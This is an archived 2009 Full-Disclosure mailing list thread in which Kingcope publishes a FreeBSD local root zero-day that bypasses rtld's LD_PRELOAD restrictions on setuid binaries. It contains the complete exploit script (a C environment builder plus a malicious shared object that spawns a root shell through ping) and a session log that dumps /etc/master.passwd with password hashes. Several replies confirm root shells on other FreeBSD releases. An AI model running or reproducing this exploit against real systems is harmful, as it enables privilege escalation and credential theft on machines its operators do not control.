env.c:11: warning: incompatible implicit declaration of built-in function
'execl'
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
ALEX-ALEX
#id -a
uid=1018(user) gid=1018(user) euid=0(root) groups=1018(user)
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] ** FreeBSD local r00t zeroday

2009-11-30 Thread Kingcope
** FreeBSD local r00t 0day
Discovered  Exploited by Nikolaos Rangos also known as Kingcope.
Nov 2009 BiG TiME

Go fetch your FreeBSD r00tkitz // http://www.youtube.com/watch?v=dDnhthI27Fg

There is an unbelievable simple local r00t bug in recent FreeBSD versions.
I audited FreeBSD for local r00t bugs a long time *sigh*. Now it pays out.

The bug resides in the Run-Time Link-Editor (rtld).
Normally rtld does not allow dangerous environment variables like LD_PRELOAD
to be set when executing setugid binaries like ping or su.
With a rather simple technique rtld can be tricked into
accepting LD variables even on setugid binaries.
See the attached exploit for details.

Example exploiting session
**
%uname -a;id;
FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21
15:48:17 UTC 2009
r...@almeida.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  i386
uid=1001(kcope) gid=1001(users) groups=1001(users)
%./w00t.sh
FreeBSD local r00t zeroday
by Kingcope
November 2009
env.c: In function 'main':
env.c:5: warning: incompatible implicit declaration of built-in
function 'malloc'
env.c:9: warning: incompatible implicit declaration of built-in
function 'strcpy'
env.c:11: warning: incompatible implicit declaration of built-in
function 'execl'
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
ALEX-ALEX
# uname -a;id;
FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21
15:48:17 UTC 2009
r...@almeida.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  i386
uid=1001(kcope) gid=1001(users) euid=0(root) groups=1001(users)
# cat /etc/master.passwd
# $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29
kensmith Exp $
#
root:$1$AUbbHoOs$CCCsw7hsMB14KBkeS1xlz2:0:0::0:0:Charlie :/root:/bin/csh
toor:*:0:0::0:0:Bourne-again Superuser:/root:
daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5::0:0:System :/:/usr/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25::0:0:Sendmail Submission
User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66::0:0:UUCP
pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin
kcope:$1$u2wMkYLY$CCCuKax6dvYJrl2ZCYXA2:1001:1001::0:0:User
:/home/kcope:/bin/sh
#

Systems tested/affected
**
FreeBSD 8.0-RELEASE *** VULNERABLE
FreeBSD 7.1-RELEASE *** VULNERABLE
FreeBSD 6.3-RELEASE *** NOT VULN
FreeBSD 4.9-RELEASE *** NOT VULN

*EXPLOIT*

#!/bin/sh
echo ** FreeBSD local r00t zeroday
echo by Kingcope
echo November 2009
cat  env.c  _EOF
#include stdio.h

main() {
extern char **environ;
environ = (char**)malloc(8096);

environ[0] = (char*)malloc(1024);
environ[1] = (char*)malloc(1024);
strcpy(environ[1], LD_PRELOAD=/tmp/w00t.so.1.0);

execl(/sbin/ping, ping, 0);
}
_EOF
gcc env.c -o env
cat  program.c  _EOF
#include unistd.h
#include stdio.h
#include sys/types.h
#include stdlib.h

void _init() {
extern char **environ;
environ=NULL;
system(echo ALEX-ALEX;/bin/sh);
}
_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles
cp w00t.so.1.0 /tmp/w00t.so.1.0
./env

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] ** FreeBSD local r00t zeroday

2009-11-30 Thread Ed Carp
On 11/30/09, Kingcope kco...@googlemail.com wrote:

 Systems tested/affected
 **
 FreeBSD 8.0-RELEASE *** VULNERABLE
 FreeBSD 7.1-RELEASE *** VULNERABLE
 FreeBSD 6.3-RELEASE *** NOT VULN
 FreeBSD 4.9-RELEASE *** NOT VULN

Glad I still run 6.3!  How about 6.4?

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] ** FreeBSD local r00t zeroday

2009-11-30 Thread phantomcircuit
Confirmed on 7.2-RELEASE-p4 fully patched according to freebsd-update.

%sh exploit.sh
Desktop env env.c exploit exploit.c exploit.sh payload.c payload.o 
private program.c program.o public public_html run.sh w00t.so.1.0 
FreeBSD local r00t zeroday
by Kingcope
November 2009
env.c: In function 'main':
env.c:5: warning: incompatible implicit declaration of built-in function 
'malloc'
env.c:9: warning: incompatible implicit declaration of built-in function 
'strcpy'
env.c:11: warning: incompatible implicit declaration of built-in 
function 'execl'
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
ALEX-ALEX
# id
uid=1001(phantomcircuit) gid=20(staff) euid=0(root) 
groups=20(staff),0(wheel)
# uname -a
FreeBSD phantomcircuit.mine.nu 7.2-RELEASE-p4 FreeBSD 7.2-RELEASE-p4 #0: 
Fri Oct  2 12:21:39 UTC 2009 
r...@i386-builder.daemonology.net:/usr/obj/usr/src/sys/GENERIC  i386
#

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] ** FreeBSD local r00t zeroday

2009-11-30 Thread Benji
7.0 not vuln.

On Mon, Nov 30, 2009 at 10:49 PM, Ed Carp e...@pobox.com wrote:

 On 11/30/09, Kingcope kco...@googlemail.com wrote:

  Systems tested/affected
  **
  FreeBSD 8.0-RELEASE *** VULNERABLE
  FreeBSD 7.1-RELEASE *** VULNERABLE
  FreeBSD 6.3-RELEASE *** NOT VULN
  FreeBSD 4.9-RELEASE *** NOT VULN

 Glad I still run 6.3!  How about 6.4?

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] ** FreeBSD local r00t zeroday

2009-11-30 Thread Cody Robertson
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


On Nov 30, 2009, at 6:31 PM, phantomcircuit wrote:

 Confirmed on 7.2-RELEASE-p4 fully patched according to freebsd-update.

 %sh exploit.sh
 Desktop env env.c exploit exploit.c exploit.sh payload.c payload.o
 private program.c program.o public public_html run.sh w00t.so.1.0
 FreeBSD local r00t zeroday
 by Kingcope
 November 2009
 env.c: In function 'main':
 env.c:5: warning: incompatible implicit declaration of built-in  
 function
 'malloc'
 env.c:9: warning: incompatible implicit declaration of built-in  
 function
 'strcpy'
 env.c:11: warning: incompatible implicit declaration of built-in
 function 'execl'
 /libexec/ld-elf.so.1: environment corrupt; missing value for
 /libexec/ld-elf.so.1: environment corrupt; missing value for
 /libexec/ld-elf.so.1: environment corrupt; missing value for
 /libexec/ld-elf.so.1: environment corrupt; missing value for
 /libexec/ld-elf.so.1: environment corrupt; missing value for
 ALEX-ALEX
 # id
 uid=1001(phantomcircuit) gid=20(staff) euid=0(root)
 groups=20(staff),0(wheel)
 # uname -a
 FreeBSD phantomcircuit.mine.nu 7.2-RELEASE-p4 FreeBSD 7.2-RELEASE-p4  
 #0:
 Fri Oct  2 12:21:39 UTC 2009
 r...@i386-builder.daemonology.net:/usr/obj/usr/src/sys/GENERIC  i386
 #

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

7.2-RELEASE

[co...@popo ~]$ ./env
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
ALEX-ALEX
#

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (Darwin)

iEYEARECAAYFAksUYGkACgkQAr2PPaFwRupDPQCcDtqiPyNof9ST2gLjJBw8pNMM
nMQAn0ynrghE5hrzeuIWVIdZg5N5N1hT
=HN3D
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] ** FreeBSD local r00t zeroday

2009-11-30 Thread Ryan Steinmetz
6.4-RELEASE not vuln

On (11/30/09 22:51), Benji wrote:
 7.0 not vuln.
 
 On Mon, Nov 30, 2009 at 10:49 PM, Ed Carp e...@pobox.com wrote:
 
  On 11/30/09, Kingcope kco...@googlemail.com wrote:
 
   Systems tested/affected
   **
   FreeBSD 8.0-RELEASE *** VULNERABLE
   FreeBSD 7.1-RELEASE *** VULNERABLE
   FreeBSD 6.3-RELEASE *** NOT VULN
   FreeBSD 4.9-RELEASE *** NOT VULN
 
  Glad I still run 6.3!  How about 6.4?
 
  ___
  Full-Disclosure - We believe in it.
  Charter: http://lists.grok.org.uk/full-disclosure-charter.html
  Hosted and sponsored by Secunia - http://secunia.com/
 

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/


-- 
Ryan Steinmetz
Lead Security/Systems Administrator
Infrastructure Engineering
Rochester Institute of Technology
585.475.5663
PGP: EF36 D45A 5CA9 28B1 A550  18CD A43C D111 7AD7 FAF2

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] ** FreeBSD local r00t zeroday

2009-11-30 Thread David Berard
 7.0 not vuln.

7.0 vulnerable here,

$ ./env 
/libexec/ld-elf.so.1: environment corrupt; missing value for 
/libexec/ld-elf.so.1: environment corrupt; missing value for 
/libexec/ld-elf.so.1: environment corrupt; missing value for 
/libexec/ld-elf.so.1: environment corrupt; missing value for 
/libexec/ld-elf.so.1: environment corrupt; missing value for 
ALEX-ALEX
# uname -r
7.0-RELEASE-p3

 
 On Mon, Nov 30, 2009 at 10:49 PM, Ed Carp erc at pobox.com wrote:
 
 On 11/30/09, Kingcope kcope2 at googlemail.com wrote:
 
 Systems tested/affected
 **
 FreeBSD 8.0-RELEASE *** VULNERABLE
 FreeBSD 7.1-RELEASE *** VULNERABLE
 FreeBSD 6.3-RELEASE *** NOT VULN
 FreeBSD 4.9-RELEASE *** NOT VULN
 
 Glad I still run 6.3!  How about 6.4?
 
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/
 

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

--
David BERARD
-
contact(at)davidberard.fr
GPG|PGP KeyId 0xC8533354
GPG|PGP Key http://davidberard.fr/C8533354.gpgkey
-
*  No electrons were harmed in  *
* the transmission of this email*



PGP.sig
Description: This is a digitally signed message part
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] ** FreeBSD local r00t zeroday

2009-11-30 Thread bk


On Nov 30, 2009, at 9:25 PM, David Berard wrote:

 7.0 not vuln.
 
 7.0 vulnerable here,
 
 $ ./env 
 /libexec/ld-elf.so.1: environment corrupt; missing value for 
 /libexec/ld-elf.so.1: environment corrupt; missing value for 
 /libexec/ld-elf.so.1: environment corrupt; missing value for 
 /libexec/ld-elf.so.1: environment corrupt; missing value for 
 /libexec/ld-elf.so.1: environment corrupt; missing value for 
 ALEX-ALEX
 # uname -r
 7.0-RELEASE-p3

Here as well:

bin/Kingcope.sh: new file: 35 lines, 772 characters.
[ch...@demon ~]$ chmod +x bin/Kingcope.sh 
[ch...@demon ~]$ Kingcope.sh 
bin ktrace.out scratch vent_stalk FreeBSD local r00t zeroday
by Kingcope
November 2009
env.c: In function 'main':
env.c:5: warning: incompatible implicit declaration of built-in function 
'malloc'
env.c:9: warning: incompatible implicit declaration of built-in function 
'strcpy'
env.c:11: warning: incompatible implicit declaration of built-in function 
'execl'
/libexec/ld-elf.so.1: environment corrupt; missing value for 
/libexec/ld-elf.so.1: environment corrupt; missing value for 
/libexec/ld-elf.so.1: environment corrupt; missing value for 
/libexec/ld-elf.so.1: environment corrupt; missing value for 
/libexec/ld-elf.so.1: environment corrupt; missing value for 
ALEX-ALEX
# whoami
root
# uname -a
FreeBSD demon.smtps.net 7.0-RELEASE FreeBSD 7.0-RELEASE #0: Sun Feb 24 19:59:52 
UTC 2008 r...@logan.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  i386

It's a VM if that matters.

--
chort

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/